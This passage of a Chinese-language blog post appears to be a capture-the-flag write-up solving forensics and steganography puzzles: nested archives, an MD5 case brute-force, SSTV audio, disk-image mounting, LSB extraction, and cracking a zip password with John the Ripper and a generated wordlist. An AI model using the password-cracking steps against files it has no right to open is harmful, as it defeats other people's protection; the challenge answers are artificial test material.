<p>用上面的方法，可以从 2_c.jpg 中拆出 3_c.jpg，然后继续从 3_c.jpg 拆出 4_c.jpg。然后从 4_c.jpg 继续拆，就发现得到的不是图片了，而是一个 flag.txt，这个文件里面的内容就是 flag。</p>
<h2 id="like1000">like1000</h2>
<p>下载附件 1000.tar，然后解压一下，得到：</p>
<figure class="highlight plaintext"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">1000</span><br><span class="line">├── 999.tar</span><br><span class="line">└── filler.txt</span><br></pre></td></tr></tbody></table></figure>
<p>这里面的 filler.txt 里面只有一些乱七八糟的内容。然后如果把 999.tar 继续解压，就会得到类似的内容（filler.txt 和 998.tar）。然后这样一直拆下去，拆到 1.tar 就应该能拿到 flag。</p>
<p>不过这样的话，手动解压 1000 次也太麻烦了，而且很慢。所以我们可以写一个脚本，帮忙解压：</p>
<figure class="highlight python"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> os</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1000</span>, <span class="number">0</span>, -<span class="number">1</span>):</span><br><span class="line">    os.system(<span class="string">f'tar xf tar_temp/<span class="subst">{i}</span>.tar --directory tar_temp'</span>)</span><br><span class="line">    os.system(<span class="string">f'rm tar_temp/<span class="subst">{i}</span>.tar'</span>)</span><br></pre></td></tr></tbody></table></figure>
<p>把 1000.tar 放到 tar_temp 目录里面，然后跑一下这个脚本，它就会帮忙一层层地解压。解压到最后，tar_temp 里面的文件就剩下 filler.txt 和 flag.png。打开 flag.png，把 flag 抄下来即可。</p>
<h2 id="upper-lower-case">upper-lower case</h2>
<blockquote>
<p>题面按照真实事件改编。</p>
</blockquote>
<p>题面很简单，就是将 <code>y0u_re4lly_kn0w_th1s_congr4tulat10ns</code> 中的字母正确地大小写，使得其 MD5 等于 <code>7513209051f455fa44d0fa5cd0f3e051</code>。</p>
<p>数一下，这个字符串中有 25 个字母，所以一共有 <span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><msup><mn>2</mn><mn>25</mn></msup><mo>≈</mo><mn>3</mn><mo>×</mo><mn>1</mn><msup><mn>0</mn><mn>7</mn></msup></mrow><annotation encoding="application/x-tex">2^{25} 3 10^7</annotation></semantics></math></span><span class="katex-html" data-aria-hidden="true"><span class="base"><span class="strut" style="height:0.8141079999999999em;vertical-align:0em;"></span><span class="mord"><span class="mord">2</span><span class="msupsub"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.8141079999999999em;"><span style="top:-3.063em;margin-right:0.05em;"><span class="pstrut" style="height:2.7em;"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight"><span class="mord mtight">2</span><span class="mord mtight">5</span></span></span></span></span></span></span></span></span><span class="mspace" style="margin-right:0.2777777777777778em;"></span><span class="mrel">≈</span><span class="mspace" style="margin-right:0.2777777777777778em;"></span></span><span class="base"><span class="strut" style="height:0.72777em;vertical-align:-0.08333em;"></span><span class="mord">3</span><span class="mspace" style="margin-right:0.2222222222222222em;"></span><span class="mbin">×</span><span class="mspace" style="margin-right:0.2222222222222222em;"></span></span><span class="base"><span class="strut" style="height:0.8141079999999999em;vertical-align:0em;"></span><span class="mord">1</span><span class="mord"><span class="mord">0</span><span class="msupsub"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.8141079999999999em;"><span style="top:-3.063em;margin-right:0.05em;"><span class="pstrut" style="height:2.7em;"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight">7</span></span></span></span></span></span></span></span></span></span></span> 种可能。这个数量级，其实不是很大，可以考虑暴力全都试一遍。</p>
<figure class="highlight rust"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">use</span> itertools::Itertools;</span><br><span class="line"><span class="keyword">use</span> md5::{Digest, Md5};</span><br><span class="line"><span class="keyword">use</span> hex_literal::hex;</span><br><span class="line"></span><br><span class="line"><span class="keyword">fn</span> <span class="title function_">main</span>() {</span><br><span class="line">    <span class="keyword">let</span> <span class="variable">product</span> = (<span class="number">0</span>..<span class="number">25</span>).<span class="title function_ invoke__">map</span>(|_| [<span class="literal">false</span>, <span class="literal">true</span>].<span class="title function_ invoke__">into_iter</span>()).<span class="title function_ invoke__">multi_cartesian_product</span>();</span><br><span class="line">    <span class="keyword">for</span> <span class="variable">combination</span> <span class="keyword">in</span> product {</span><br><span class="line">        <span class="keyword">let</span> <span class="keyword">mut </span><span class="variable">mask_iter</span> = combination.<span class="title function_ invoke__">into_iter</span>();</span><br><span class="line">        <span class="keyword">let</span> <span class="variable">string</span>: <span class="type">Vec</span>&lt;_&gt; = <span class="string">"y0u_re4lly_kn0w_th1s_congr4tulat10ns"</span>.<span class="title function_ invoke__">bytes</span>()</span><br><span class="line">            .<span class="title function_ invoke__">map</span>(|ch| <span class="keyword">if</span> ch.<span class="title function_ invoke__">is_ascii_alphabetic</span>() &amp;&amp; mask_iter.<span class="title function_ invoke__">next</span>().<span class="title function_ invoke__">unwrap</span>() {</span><br><span class="line">                ch.<span class="title function_ invoke__">to_ascii_uppercase</span>()</span><br><span class="line">            } <span class="keyword">else</span> {</span><br><span class="line">                ch</span><br><span class="line">            })</span><br><span class="line">            .<span class="title function_ invoke__">collect</span>();</span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span> Md5::<span class="title function_ invoke__">digest</span>(&amp;string)[..] == hex!(<span class="string">"7513209051f455fa44d0fa5cd0f3e051"</span>) {</span><br><span class="line">            <span class="built_in">println!</span>(<span class="string">"{}"</span>, std::str::<span class="title function_ invoke__">from_utf8</span>(&amp;string).<span class="title function_ invoke__">unwrap</span>());</span><br><span class="line">        }</span><br><span class="line">    }</span><br><span class="line">}</span><br></pre></td></tr></tbody></table></figure>
<p>然后跑一遍这玩意，就能拿到 flag 了。</p>
<h2 id="whitepages">WhitePages</h2>
<p>首先先直接打开这个文件，然后经过观察，不难发现这个文件里面有两种字符：<code>U+2003</code> 和 <code></code>。</p>
<p><a href="/images/2022-7-11-COMPASS-Summer-Writeup/Whitepages_1.png" class="glightbox"><img src="/images/2022-7-11-COMPASS-Summer-Writeup/Whitepages_1.png" loading="lazy"></a></p>
<p><code>U+2003</code> 查了一下，也是空格的一种。所以这个文件里面由两种空格组成。</p>
<p>遂考虑二进制。我们不妨把 <code>U+2003</code> 改成 <code>0</code>，把 <code></code>（空格）改成 <code>1</code>，然后用二进制解码一下，就得到了 flag。</p>
<p><a href="/images/2022-7-11-COMPASS-Summer-Writeup/Whitepages_2.png" class="glightbox"><img src="/images/2022-7-11-COMPASS-Summer-Writeup/Whitepages_2.png" loading="lazy"></a></p>
<h2 id="sleuthkit-apprentice">Sleuthkit Apprentice</h2>
<p>下载下来是一个 disk.flag.img.gz 文件，首先当然是解压一下，拿到 disk.flag.img。</p>
<blockquote>
<p>如果不想那么麻烦的话，理论上用 Disk Genius 等硬盘管理软件打开，然后直接翻文件应该也是可以的。</p>
</blockquote>
<p>用 <code>fdisk</code> 看看里面有啥分区：</p>
<figure class="highlight plaintext"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">$ fdisk disk.flag.img </span><br><span class="line"></span><br><span class="line">Welcome to fdisk (util-linux 2.31.1).</span><br><span class="line">Changes will remain in memory only, until you decide to write them.</span><br><span class="line">Be careful before using the write command.</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">Command (m for help): p       </span><br><span class="line">Disk disk.flag.img: 300 MiB, 314572800 bytes, 614400 sectors</span><br><span class="line">Units: sectors of 1 * 512 = 512 bytes</span><br><span class="line">Sector size (logical/physical): 512 bytes / 512 bytes</span><br><span class="line">I/O size (minimum/optimal): 512 bytes / 512 bytes</span><br><span class="line">Disklabel type: dos</span><br><span class="line">Disk identifier: 0x7389e82d</span><br><span class="line"></span><br><span class="line">Device         Boot  Start    End Sectors  Size Id Type</span><br><span class="line">disk.flag.img1 *      2048 206847  204800  100M 83 Linux</span><br><span class="line">disk.flag.img2      206848 360447  153600   75M 82 Linux swap / Solaris</span><br><span class="line">disk.flag.img3      360448 614399  253952  124M 83 Linux</span><br><span class="line"></span><br><span class="line">Command (m for help): q</span><br><span class="line"></span><br></pre></td></tr></tbody></table></figure>
<p>实践表明，第一个分区里面没有，第二个是交换分区也不太可能，于是直接看第三个分区。</p>
<p>第三个分区的起始位置是 360448（单位是 sectors），然后换算成 byte 就是 184549376。然后就可以用 <code>mount</code> 挂载这个分区了：</p>
<figure class="highlight bash"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ sudo mount -o loop,offset=184549376 disk.flag.img /mnt</span><br></pre></td></tr></tbody></table></figure>
<p>挂载完之后，就可以在 <code>/mnt</code> 下面翻文件了。经过一通尝试之后，发现 flag 在 <code>/root/my_folder/flag.uni.txt</code> 里面，<code>cat</code> 一下即可。</p>
<h2 id="m00nwalk">m00nwalk</h2>
<p>听一下音频，有点像 SSTV 的信号。可以用 <a target="_blank" rel="noopener" href="https://www.qsl.net/on6mu/rxsstv.htm">RX-SSTV</a> 接收并解析。</p>
<p>首先先安装一个 <a target="_blank" rel="noopener" href="https://vac.muzychenko.net/en/download.htm">Virtual Audio Cable</a>（Lite 版本就行），用来把 wav 的音频输出重定向回输入，才能被 RX-SSTV 收到。</p>
<p>然后打开 RX-SSTV，再播放 message.wav，RX-SSTV 就会自动的设置好模式开始接收这张图片。</p>
<p><a href="/images/2022-7-11-COMPASS-Summer-Writeup/m00nwalk_SSTV.png" class="glightbox"><img src="/images/2022-7-11-COMPASS-Summer-Writeup/m00nwalk_SSTV.png" loading="lazy"></a></p>
<p>接收完之后，就拿到了这张图片：</p>
<p><a href="/images/2022-7-11-COMPASS-Summer-Writeup/m00nwalk_image.png" class="glightbox"><img src="/images/2022-7-11-COMPASS-Summer-Writeup/m00nwalk_image.png" loading="lazy"></a></p>
<p>把这张图片倒过来，把里面的 flag 抄下来就行了。</p>
<h2 id="weak-password">weak password</h2>
<h3 id="解压-zip-文件">解压 zip 文件</h3>
<p>zip 文件下载下来之后，发现它是有密码的。然后题面写着密码是 “five-byte printable characters”，即 5 位的可打印字符。这里用 John the Ripper 来破解密码。</p>
<p>首先先用 <code>zip2john</code> 把 zip 转成 John 能处理的 hash：</p>
<figure class="highlight bash"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ zip2john xxxtentacion.zip &gt; zip.hashes</span><br></pre></td></tr></tbody></table></figure>
<p>然后需要写一个密码字典生成器，让 John 针对性地破解。</p>
<figure class="highlight python"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> string</span><br><span class="line"><span class="keyword">import</span> itertools</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> s <span class="keyword">in</span> itertools.product(string.printable[:-<span class="number">5</span>], repeat=<span class="number">5</span>):</span><br><span class="line">    <span class="built_in">print</span>(<span class="string">''</span>.join(s))</span><br></pre></td></tr></tbody></table></figure>
<p>然后我们就可以用 John 破解了。</p>
<p>下面这句命令的意思是，让 <code>gen.py</code> 把字典打印到标准输出，然后重定向到 <code>john</code>。然后 <code>john</code> 用 <code>--pipe</code> 参数让它从标准输入读取密码字典。</p>
<figure class="highlight plaintext"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">$ python3 gen.py | john zip.hashes --pipe</span><br><span class="line">Using default input encoding: UTF-8</span><br><span class="line">Loaded 1 password hash (PKZIP [32/64])</span><br><span class="line">Press Ctrl-C to abort, or send SIGUSR1 to john process for status</span><br><span class="line">61f@X            (xxxtentacion.zip/xxxtentacion/xxxtentacion.jpg)</span><br><span class="line">1g 0:00:04:21  0.003828g/s 1874Kp/s 1874Kc/s 1874KC/s 61f;q..61f@!</span><br><span class="line">Use the "--show" option to display all of the cracked passwords reliably</span><br><span class="line">Session completed</span><br></pre></td></tr></tbody></table></figure>
<p><del>看了下 CPU 占用，瓶颈居然在 Python 生成字典上。</del></p>
<p>然后就破解出 zip 的密码：<code>61f@X</code>。用这个密码解压 zip，就得到了一张 xxxtentacion.jpg 图片。</p>
<h3 id="解一层文件隐藏">解一层文件隐藏</h3>
<p><del>众所周知，jpg 是不能做 LSB 隐写的，因为 jpg 的有损压缩会破坏 LSB。</del></p>
<p>用二进制编辑器打开 xxxtentacion.jpg，然后发现这个文件的后面有一串非常熟悉的编码（其实还是 base64）。</p>
<p><a href="/images/2022-7-11-COMPASS-Summer-Writeup/Weak_Password_jpg_hidden.png" class="glightbox"><img src="/images/2022-7-11-COMPASS-Summer-Writeup/Weak_Password_jpg_hidden.png" loading="lazy"></a></p>
<p>把这段内容复制出来，用 base64 解码一下：</p>
<p><a href="/images/2022-7-11-COMPASS-Summer-Writeup/Weak_Password_base64_decode.png" class="glightbox"><img src="/images/2022-7-11-COMPASS-Summer-Writeup/Weak_Password_base64_decode.png" loading="lazy"></a></p>
<p>这里发现了一个 PNG 的文件头，把它保存下来，后缀名改成 <code>.png</code>，就可以得到一张图片：</p>
<p><a href="/images/2022-7-11-COMPASS-Summer-Writeup/Weak_Password_qrcode_raw.png" class="glightbox"><img src="/images/2022-7-11-COMPASS-Summer-Writeup/Weak_Password_qrcode_raw.png" loading="lazy"></a></p>
<h3 id="二维码">二维码</h3>
<p>简单观察一下这张图，就发现它非常地“二维码”。根据二维码的格式，这张图应该先反色一下（根据右下角那个定位点），然后再把三个角修好，就得到了一个真正的二维码：</p>
<p><a href="/images/2022-7-11-COMPASS-Summer-Writeup/Weak_Password_qrcode.png" class="glightbox"><img src="/images/2022-7-11-COMPASS-Summer-Writeup/Weak_Password_qrcode.png" loading="lazy"></a></p>
<p>扫描一下，得到 <code>6C75652C20666172206578636565647320796F75722062656C6965667D</code>。然后用 hex（16 进制）解码一下，得到 <code>lue, far exceeds your belief}</code>。</p>
<p><del>经过无厘头猜测，这个应该是 flag 的后半段，那前半段在哪呢？</del></p>
<h3 id="lsb">LSB</h3>
<p>我知道你很急，但你先别急。题目里面提到的 LSB 还没用上呢。</p>
<p>用 StegSolve.jar 打开原图，然后左右翻看。然后发现在 Red plane 0 里面（其实 Green 和 Blue 也有，而且是一样的），图片的左边有一串不明信息。</p>
<p><a href="/images/2022-7-11-COMPASS-Summer-Writeup/Weak_Password_red_plane_0.png" class="glightbox"><img src="/images/2022-7-11-COMPASS-Summer-Writeup/Weak_Password_red_plane_0.png" loading="lazy"></a></p>
<p>然后用 Data Extract 功能，选中 Red 的 0，然后直接提取，就得到了 flag 的前半段：</p>
<p><a href="/images/2022-7-11-COMPASS-Summer-Writeup/Weak_Password_data_extract.png" class="glightbox"><img src="/images/2022-7-11-COMPASS-Summer-Writeup/Weak_Password_data_extract.png" loading="lazy"></a></p>
<p>把 flag 拼接一下，就有：<code>ctfshow{Your potential,value, far exceeds your belief}</code>。再按照题目的要求处理一下，就得到了最终的 flag：<code>ctfshow{Your_potential_value_far_exceeds_your_belief}</code>。</p>
<h2 id="简单的隐写">简单的隐写</h2>
<p>用上一题差不多的思路，用 StegSolve.jar 打开，发现 Red plane 1 的地方有一行不明信息。</p>
<p><a href="/images/2022-7-11-COMPASS-Summer-Writeup/Simple_Forensics.png" class="glightbox"><img src="/images/2022-7-11-COMPASS-Summer-Writeup/Simple_Forensics.png" loading="lazy"></a></p>
<p>但是并不能直接提取。<del>如果直接提取的话，虽然能看到 <code>ctfshow{</code>，但是后面的内容不完全对</del>。</p>
<p>原因是这幅图用了调色板（palette）。即每一个像素，只记录一个颜色的编号，再用编号去调色板中得到相应的 RGB 颜色。</p>
<p>然后隐写的信息是写在原始数据（即编号）里面的，而不是最终的 RGB 颜色，所以会出现一定的偏差。</p>
<p>不过好在 Python 的 Pillow 库可以直接读取这个原始数据。直接用这个脚本读一下就行：</p>
<figure class="highlight python"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> PIL <span class="keyword">import</span> Image</span><br><span class="line"></span><br><span class="line">image = Image.<span class="built_in">open</span>(<span class="string">'mumuzi.png'</span>)</span><br><span class="line">pixels = <span class="built_in">list</span>(image.getdata())  <span class="comment"># 获取的是原始数据</span></span><br><span class="line">binary = [ pixel % <span class="number">2</span> <span class="keyword">for</span> pixel <span class="keyword">in</span> pixels[:<span class="number">400</span>] ]  <span class="comment"># 获取前 400 个像素的 LSB</span></span><br><span class="line"><span class="built_in">print</span>(<span class="string">''</span>.join(<span class="built_in">map</span>(<span class="built_in">str</span>, binary)))  <span class="comment"># 打印</span></span><br></pre></td></tr></tbody></table></figure>
<p>然后得到：</p>
<figure class="highlight plaintext"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">01100011011101000110011001110011011010000110111101110111011110110011010001100110011001000</span><br><span class="line">01100010011010001100001011001100011000000101101001100110011001001100011011001010010110100</span><br><span class="line">11010000110101001101000011001100101101001110010011010000110010001100000010110100110011011</span><br><span class="line">00110011000110110000100110101001110000110010100110100011000100011000100110101001101100111</span><br><span class="line">11010000000000000000000000000000000000000000</span><br></pre></td></tr></tbody></table></figure>
<p>然后扔到 CyberChef 解码一下就能拿到 flag。</p>
</div></article></div></main><footer><div class="paginator"><a class="next" href="/2021/10/31/Hackergame-2021/">NEXT</a></div><div class="copyright"><p>© 2017 - 2023 <a href="https://blog.monadx.com">Monad</a>, powered by <a href="https://hexo.io/" target="_blank">Hexo</a> and <a href="https://github.com/pinggod/hexo-theme-apollo" target="_blank">hexo-theme-apollo</a>.</p></div></footer></div><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.defer=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer',"GTM-PP344KH");</script><script src="/js/all.min.js" defer></script></body></html>